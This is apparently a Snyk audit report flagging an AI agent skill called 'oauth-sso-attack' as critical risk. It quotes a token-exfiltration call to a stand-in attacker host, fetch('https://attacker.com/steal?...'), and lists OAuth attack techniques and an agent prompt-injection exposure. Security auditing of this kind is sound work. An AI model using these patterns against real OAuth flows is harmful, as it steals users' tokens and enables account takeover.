oauth-sso-attack

Fail

Audited by Snyk on Apr 22, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.90). These URLs are not direct executable downloads but are highly suspicious OAuth/redirect URIs (typosquatted subdomain, open-redirect via query and path-traversal) that can hijack authorization flows, exfiltrate tokens or redirect users to malware, so they represent a high-risk attack vector.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content is a deliberate malicious playbook: it provides step-by-step OAuth/SSO attack techniques (redirect_uri bypasses, state/nonce CSRF, token leakage, scope escalation), includes PoC code that exfiltrates authorization codes and tokens to attacker-controlled endpoints (e.g., fetch('https://attacker.com/steal?...'), DNS exfiltration), and describes full account-takeover workflows—constituting clear intent to steal credentials/tokens and enable unauthorized access.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill's SKILL.md explicitly instructs the agent to fetch and inspect public OAuth endpoints (e.g., clicking "第三方登录" and checking /.well-known/openid-configuration, /oauth/authorize, /api/auth/providers and redirect URLs) so the agent will read untrusted third-party web content whose responses directly determine follow-up exploit actions.

Issues (3)

E005 (CRITICAL): Suspicious download URL detected in skill instructions.

E006 (CRITICAL): Malicious code pattern detected in skill scripts.

W011 (MEDIUM): Third-party content exposure detected (indirect prompt injection risk).

Audit Metadata
Risk Level: CRITICAL
Analyzed: Apr 22, 2026, 10:09 AM
Issues: 3